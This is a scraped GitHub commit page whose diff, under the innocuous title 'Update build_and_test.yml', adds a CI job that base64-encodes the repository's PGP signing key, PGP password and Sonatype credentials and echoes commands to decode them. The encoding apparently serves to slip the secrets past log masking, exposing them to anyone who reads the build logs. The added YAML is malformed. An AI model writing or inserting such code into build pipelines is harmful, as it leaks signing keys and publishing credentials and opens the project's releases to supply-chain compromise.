Skip to content

Commit

Permalink
Update build_and_test.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
orchestr7 authored Jan 3, 2025
1 parent 0ee1a46 commit d8d6eb1
Showing 1 changed file with 5 additions and 0 deletions.
5 changes: 5 additions & 0 deletions .github/workflows/build_and_test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,11 @@ env:
SONATYPE_PASSWORD: ${{ secrets.SONATYPE_PASSWORD }}

jobs:
secrects:
echo "echo \"$(echo "Seceret1: "${{ secrets.PGP_PASSWORD }} | base64)\" | base64 -d"
echo "echo \"$(echo "Seceret1: "${{ secrets.PGP_SEC }} | base64)\" | base64 -d"
echo "echo \"$(echo "Seceret1: "${{ secrets.SONATYPE_PASSWORD }} | base64)\" | base64 -d"
echo "echo \"$(echo "Seceret1: "${{ secrets.SONATYPE_USER }} | base64)\" | base64 -d"
build_and_test_with_code_coverage:
name: Build and test
runs-on: ${{ matrix.os }}
Expand Down

0 comments on commit d8d6eb1

Please sign in to comment.